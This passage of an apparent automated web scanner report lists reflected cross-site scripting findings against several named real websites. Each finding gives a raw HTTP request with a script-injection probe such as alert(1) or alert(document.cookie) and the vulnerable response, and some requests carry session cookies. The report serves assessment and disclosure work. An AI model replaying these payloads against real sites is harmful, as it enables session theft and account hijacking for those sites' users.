HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Date: Mon, 16 May 2011 12:46:50 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<a href="/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1&931f9\"><script>alert(1)</script>426411977a5=1" title="Home">
...[SNIP]...

3.61. https://www.aspireaffiliates.com/mobile/ [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /mobile/

Issue detail

The value of the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e678c"><script>alert(1)</script>c2083c9f32b was submitted in the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter. This input was echoed as e678c\"><script>alert(1)</script>c2083c9f32b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mobile/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1e678c"><script>alert(1)</script>c2083c9f32b HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Date: Mon, 16 May 2011 12:46:21 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<a href="/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1e678c\"><script>alert(1)</script>c2083c9f32b" title="Home">
...[SNIP]...

3.62. https://www.aspireaffiliates.com/mobile/ [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /mobile/

Issue detail

The value of the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e4024</script><script>alert(1)</script>0074ed146f4 was submitted in the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mobile/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1e4024</script><script>alert(1)</script>0074ed146f4 HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Date: Mon, 16 May 2011 12:46:45 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
ular").css("padding-top","630px");
       
       });
});

function RedirectToUrl(url){
//alert(url);
if (!url.indexOf('?')){url=url+'?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1e4024</script><script>alert(1)</script>0074ed146f4';}
window.location=url;

}
function goto(gourl){
window.location='/'+gourl+'/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1e4024</script>
...[SNIP]...

3.63. https://www.aspireaffiliates.com/mobile/ [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /mobile/

Issue detail

The value of the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94895"><script>alert(1)</script>833b2a295e9 was submitted in the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter. This input was echoed as 94895\"><script>alert(1)</script>833b2a295e9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mobile/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=94895"><script>alert(1)</script>833b2a295e9 HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Date: Mon, 16 May 2011 12:46:28 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<iframe src="https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=94895\"><script>alert(1)</script>833b2a295e9" frameborder="0" scrolling="no" height="96" width="950">
...[SNIP]...

3.64. https://www.aspireaffiliates.com/mobile/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /mobile/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab351"><script>alert(1)</script>85c0273528c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ab351\"><script>alert(1)</script>85c0273528c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mobile/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1&ab351"><script>alert(1)</script>85c0273528c=1 HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Date: Mon, 16 May 2011 12:46:49 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<a href="/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1&ab351\"><script>alert(1)</script>85c0273528c=1" title="Home">
...[SNIP]...

3.65. https://www.aspireaffiliates.com/mobile/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /mobile/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2e4bc</script><script>alert(1)</script>34debe0dd4c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mobile/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1&2e4bc</script><script>alert(1)</script>34debe0dd4c=1 HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Date: Mon, 16 May 2011 12:47:10 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
lar").css("padding-top","630px");
       
       });
});

function RedirectToUrl(url){
//alert(url);
if (!url.indexOf('?')){url=url+'?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1&2e4bc</script><script>alert(1)</script>34debe0dd4c=1';}
window.location=url;

}
function goto(gourl){
window.location='/'+gourl+'/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1&2e4bc</script>
...[SNIP]...

3.66. https://www.aspireaffiliates.com/mobile/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /mobile/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5944"><script>alert(1)</script>b657ab65e6b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c5944\"><script>alert(1)</script>b657ab65e6b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mobile/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1&c5944"><script>alert(1)</script>b657ab65e6b=1 HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Date: Mon, 16 May 2011 12:46:52 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<iframe src="https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1&c5944\"><script>alert(1)</script>b657ab65e6b=1" frameborder="0" scrolling="no" height="96" width="950">
...[SNIP]...

3.67. http://www.bet365.com/home/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bet365.com
Path:   /home/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f18d6"><script>alert(1)</script>b33b92fe45 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /home/?f18d6"><script>alert(1)</script>b33b92fe45=1 HTTP/1.1
Host: www.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D11AA414789D6755EE19B7B33000002; rmbs=2; stk=F2905C3D11AA414789D6755EE19B7B33000002;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:30:51 GMT
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: no-store
Pragma: no-cache
Cache-Control: no-store
Content-Length: 45587
Content-Type: text/html
Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 00:00:00 GMT; path=/
Cache-control: private


<!--version 1.0.0.1-->
<html>

<link rel="shortcut icon" href="http://www.bet365.com/favicons/bet365-favicon.ico" type="image/x-icon">
<head>
<META http-equiv="Content-Type" content="text/html;
...[SNIP]...
<iframe src="./mainpage.asp?rn=19232879864&f18d6"><script>alert(1)</script>b33b92fe45=1" scrolling="no" frameborder="0" marginwidth="0" marginheight="0" style="width:986px;height:1000px;" name="main" id="main">
...[SNIP]...

3.68. http://www.bet365.com/home/default.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bet365.com
Path:   /home/default.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 936ef"><script>alert(1)</script>c2361b79bb1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /home/default.asp?936ef"><script>alert(1)</script>c2361b79bb1=1 HTTP/1.1
Host: www.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D11AA414789D6755EE19B7B33000002; rmbs=2; stk=F2905C3D11AA414789D6755EE19B7B33000002;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:30:52 GMT
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: no-store
Pragma: no-cache
Cache-Control: no-store
Content-Length: 45588
Content-Type: text/html
Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 00:00:00 GMT; path=/
Cache-control: private


<!--version 1.0.0.1-->
<html>

<link rel="shortcut icon" href="http://www.bet365.com/favicons/bet365-favicon.ico" type="image/x-icon">
<head>
<META http-equiv="Content-Type" content="text/html;
...[SNIP]...
<iframe src="./mainpage.asp?rn=19545540740&936ef"><script>alert(1)</script>c2361b79bb1=1" scrolling="no" frameborder="0" marginwidth="0" marginheight="0" style="width:986px;height:1000px;" name="main" id="main">
...[SNIP]...

3.69. http://www.metacafe.com/fplayer/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.metacafe.com
Path:   /fplayer/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4702d"><script>alert(1)</script>be96a23f3a3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fplayer/?4702d"><script>alert(1)</script>be96a23f3a3=1 HTTP/1.1
Host: www.metacafe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI CUR ADM OUR NOR STA NID"
Content-Type: text/html
Date: Mon, 16 May 2011 12:25:19 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=f78158bb406bb5151e43739ad7fa5f7b; path=/; domain=.metacafe.com
Set-Cookie: OAGEO=US%7CTX%7CDallas%7C75207%7C32.7825%7C-96.8207%7C623%7C214%7C%7C%7C; path=/; domain=.metacafe.com
Set-Cookie: OAID=c8335f487e2ebd40b47e9291ba6e9e32; expires=Tue, 15-May-2012 12:25:19 GMT; path=/; domain=.metacafe.com
Set-Cookie: User=%7B%22sc%22%3A1%2C%22visitID%22%3A%22bd5051062948efee2cb06d693c6e5416%22%2C%22LEID%22%3A40%2C%22LangID%22%3A%22en%22%2C%22npUserLocations%22%3A%5B244%5D%2C%22npUserLanguages%22%3A%5B9%5D%2C%22ffilter%22%3Atrue%2C%22pve%22%3A1%2C%22fbconnected%22%3Afalse%7D; expires=Sat, 14-May-2016 12:25:19 GMT; path=/; domain=.metacafe.com
Set-Cookie: dsavip=3400536236.20480.0000; expires=Mon, 16-May-2011 13:25:19 GMT; path=/
Content-Length: 73154

           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
           <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Metacafe - Online Video Entertainment - Free video clips for your enjoyment" href="/fplayer/rss.xml?4702d"><script>alert(1)</script>be96a23f3a3=1" />
...[SNIP]...

3.70. http://www.okscratchcards.com/ [70343%27-alert(1)-%2789d3bb43680 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.okscratchcards.com
Path:   /

Issue detail

The value of the 70343%27-alert(1)-%2789d3bb43680 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4dd46'-alert(1)-'c702a91d7ec was submitted in the 70343%27-alert(1)-%2789d3bb43680 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?70343%27-alert(1)-%2789d3bb43680=14dd46'-alert(1)-'c702a91d7ec HTTP/1.1
Host: www.okscratchcards.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/7
Cookie: __utma=80613129.1362500150.1305546536.1305546536.1305546536.1; __utmb=80613129.6.10.1305546536; __utmc=80613129; __utmz=80613129.1305546536.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; CSI_20=EncryptedUniqueVisitorID=2D7C0CC8562A483265BA53D772EFAEEE&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; UniqueVisitorID=2D7C0CC8562A483265BA53D772EFAEEE; LanguageCode=ENG; CountryCode=US; CSITemp=20

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 13008
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Mon, 16 May 2011 12:42:39 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
I_20");
window.open('https://secure.neogames-tech.com/ScratchCards/Lobby.aspx?CUR=GBP&CSI=20&LNG=~ENG&BD=home.okscratchcards.com&SDN=okscratchcards.com&CKI='+cookie_id+'&70343'-alert(1)-'89d3bb43680=14dd46'-alert(1)-'c702a91d7ec','','resizable=yes,left=0,top=0,width=' + (window.screen.width-8) + ',height=' + (window.screen.height - (window.screen.height>
...[SNIP]...

3.71. http://www.okscratchcards.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.okscratchcards.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c9e66'-alert(1)-'3904ab68a42 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?c9e66'-alert(1)-'3904ab68a42=1 HTTP/1.1
Host: www.okscratchcards.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 12560
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Mon, 16 May 2011 11:37:21 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
;
var cookie_id=getCookie("CSI_20");
window.open('https://secure.neogames-tech.com/ScratchCards/Lobby.aspx?CUR=GBP&CSI=20&LNG=~ENG&BD=home.okscratchcards.com&SDN=okscratchcards.com&CKI='+cookie_id+'&c9e66'-alert(1)-'3904ab68a42=1','','resizable=yes,left=0,top=0,width=' + (window.screen.width-8) + ',height=' + (window.screen.height - (window.screen.height>
...[SNIP]...

3.72. http://www.okscratchcards.com/terms-and-conditions.aspx [& parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.okscratchcards.com
Path:   /terms-and-conditions.aspx

Issue detail

The value of the & request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f7e02'-alert(1)-'f58d0b85f2e was submitted in the & parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /terms-and-conditions.aspx?&f7e02'-alert(1)-'f58d0b85f2e HTTP/1.1
Host: www.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 22824

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml"><head>


<title>
   
Online Scratch cards, featuring over 60 flash Scratch games and scratch off tickets &ndash; okscratc
...[SNIP]...

var cookie_id=getCookie("CSI_20");
window.open('https://secure.neogames-tech.com/ScratchCards/Lobby.aspx?CUR=GBP&CSI=20&LNG=~ENG&BD=home.okscratchcards.com&SDN=okscratchcards.com&CKI='+cookie_id+'&&f7e02'-alert(1)-'f58d0b85f2e','','resizable=yes,left=0,top=0,width=' + (window.screen.width-8) + ',height=' + (window.screen.height - (window.screen.height>
...[SNIP]...

3.73. http://www.okscratchcards.com/terms-and-conditions.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.okscratchcards.com
Path:   /terms-and-conditions.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c311e'-alert(1)-'d8afc8da06f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /terms-and-conditions.aspx?c311e'-alert(1)-'d8afc8da06f=1 HTTP/1.1
Host: www.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 22827

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml"><head>


<title>
   
Online Scratch cards, featuring over 60 flash Scratch games and scratch off tickets &ndash; okscratc
...[SNIP]...
;
var cookie_id=getCookie("CSI_20");
window.open('https://secure.neogames-tech.com/ScratchCards/Lobby.aspx?CUR=GBP&CSI=20&LNG=~ENG&BD=home.okscratchcards.com&SDN=okscratchcards.com&CKI='+cookie_id+'&c311e'-alert(1)-'d8afc8da06f=1','','resizable=yes,left=0,top=0,width=' + (window.screen.width-8) + ',height=' + (window.screen.height - (window.screen.height>
...[SNIP]...

